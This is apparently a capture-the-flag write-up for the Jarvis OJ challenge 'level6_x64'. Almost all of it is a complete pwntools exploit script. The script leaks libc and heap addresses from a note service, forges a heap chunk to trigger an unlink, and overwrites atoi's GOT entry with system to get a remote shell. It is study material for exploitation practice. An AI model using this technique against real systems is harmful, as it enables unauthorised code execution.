[XMAN]level6_x64

nc pwn2.jarvisoj.com 9886

 

 

Hint1: 本题附件已更新,请大家重新下载以免影响解题。

 

level6_x64.rar.0bcca9516e27d7da23a26db801f12f4c

 

和Guestbook2一模一样

exp如下:

from pwn import *

def list_note():
    """Pick menu option 1 ("list notes") on the shared ``io`` connection.

    Waits for the menu prompt, then answers it with ``'1'``. Any output the
    program prints in response is left unread for the caller to consume.
    """
    conn = io
    conn.recvuntil('Your choice: ')
    conn.sendline('1')

def new_note(note):
    """Create a note via menu option 2 on the shared ``io`` connection.

    Args:
        note: bytes to store; its length is sent first (as decimal text) in
            answer to the length prompt, then the bytes themselves are sent
            without a trailing newline.
    """
    length_text = str(len(note))
    dialogue = (
        ('Your choice: ', '2'),
        ('Length of new note: ', length_text),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    io.recvuntil('Enter your note: ')
    io.send(note)

def edit_note(number, note):
    """Overwrite an existing note via menu option 3 on the shared ``io``.

    Args:
        number: index of the note as the program numbers it; sent as text.
        note: replacement bytes. Their length is sent at the length prompt,
            then the bytes are sent without a trailing newline. Nothing here
            limits ``len(note)`` to the note's original size — whether the
            program does is up to the target, not this helper.
    """
    dialogue = (
        ('Your choice: ', '3'),
        ('Note number: ', str(number)),
        ('Length of note: ', str(len(note))),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    io.recvuntil('Enter your note: ')
    io.send(note)

def delete_note(number):
    """Delete a note via menu option 4 on the shared ``io`` connection.

    Args:
        number: index of the note as the program numbers it; sent as text
            in answer to the "Note number" prompt.
    """
    for prompt, answer in (('Your choice: ', '4'), ('Note number: ', str(number))):
        io.recvuntil(prompt)
        io.sendline(answer)

#io = process('./freenote_x64')
#io = gdb.debug('./freenote_x64', 'b *0x400998')
# Connection to the challenge service; the two commented-out lines above are
# the local and under-gdb variants of the same script.
io = remote('pwn2.jarvisoj.com', 9886)
# NOTE(review): `elf` is loaded but never used below — the GOT address is
# hard-coded in atoi_got instead of being read from the binary.
elf = ELF('./freenote_x64')
#libc = elf.libc
# Every offset below (main_arena, the -88 correction, 0x19d0) is tied to this
# exact libc build and to the exact allocation sequence; a different libc
# (the commented-out main_arena alternative hints at one) changes them.
libc = ELF('./libc-2.19.so')
atoi_got = 0x602070  # named as atoi's GOT slot in freenote_x64 (hard-coded; not derived from `elf`)
#main_arena = 0x3C4B20
main_arena = 0x3C2760  # offset of main_arena inside libc-2.19.so, per the author

# Five equal-sized (128-byte) notes, then free the 2nd and 4th so that
# note 0 sits next to a freed chunk.
new_note(b'a' * 128)
new_note(b'b' * 128)
new_note(b'c' * 128)
new_note(b'd' * 128)
new_note(b'e' * 128)
delete_note(1)
delete_note(3)
# Note 0 is rewritten with MORE bytes than it was created with (128 + 0x10).
# The 'b' run is a marker: whatever the program prints right after it when
# listing is read back as a pointer. That the program accepts the longer
# length at all is the behaviour the whole script relies on.
edit_note(0, b'a' * 128 + b'b' * 0x10)
list_note()
io.recvuntil('b' * 0x10)
# Bytes after the marker, zero-padded to 8, as a little-endian qword.
libc_addr = u64(io.recvline().strip().ljust(8, b'\x00'))
info("libc_addr:" + str(hex(libc_addr)))
# Assumes the leaked value points 88 bytes into main_arena (a freed-chunk
# list pointer) — TODO confirm for this libc; wrong by a bin offset otherwise.
libc_base = libc_addr - main_arena - 88
info("libc_base:" + str(hex(libc_base)))
system_addr = libc_base + libc.symbols['system']
info("system_addr" + str(hex(system_addr)))

# Same trick with a longer marker (0x18) to read the next qword, which the
# script treats as a heap pointer.
edit_note(0, b'a' * 128 + b'b' * 0x18)
list_note()
io.recvuntil('b' * 0x18)
heap_addr = u64(io.recvline().strip().ljust(8, b'\x00'))
info("heap_addr:" + str(hex(heap_addr)))
# 0x19d0 is the distance from that leaked pointer back to the heap start for
# THIS allocation sequence (presumably; not derivable from anything on screen).
heap_base = heap_addr - 0x19d0
info("heap_base:" + str(hex(heap_base)))
# Address inside the heap (heap_base + 0x30) that the next payload's pointers
# are expressed relative to.
unlink_addr = heap_base + 0x30
info("unlink_addr:" + str(hex(unlink_addr)))

# A fake chunk image written through note 0: two size-like fields (0x90, 0x80),
# then two pointers at unlink_addr-0x18 and unlink_addr-0x10, padded to 0x80,
# then another (0x80, 0x90) pair; total 0x100 bytes (two notes' worth).
# The variable name says this is staged for an unlink-style check when note 1
# is freed on the delete_note(1) that follows — inferred from the shape, not
# verified against the binary here.
payload = p64(0x90) + p64(0x80) + p64(unlink_addr - 0x18) + p64(unlink_addr - 0x10)
payload = payload.ljust(0x80, b'\x00')
payload += p64(0x80) + p64(0x90)
payload = payload.ljust(0x80 * 2, b'\x00')
edit_note(0, payload)
delete_note(1)

# Seven qwords: 2, then (1, 0x100, heap_base+0x18), then (1, 8, atoi_got).
# By their values this looks like the program's own note table — a count,
# then (in-use, length, data-pointer) records — so that note 1's data pointer
# becomes atoi_got. Layout assumed from the values; confirm against the binary.
payload = p64(2) + p64(1) + p64(0x100) + p64(heap_base + 0x18) + p64(1) + p64(8) + p64(atoi_got)
payload = payload.ljust(0x80 * 2, b'\x00')
edit_note(0, payload)
# Writes system_addr through note 1, i.e. into the atoi_got slot set above.
# For this to land, the GOT must be writable (no full RELRO) — not checked here.
edit_note(1, p64(system_addr))

# The menu choice text is handed to whatever the program calls on it
# (presumably atoi, whose GOT entry now holds system).
io.recvuntil('Your choice: ')
io.sendline('/bin/sh')

io.interactive()

 
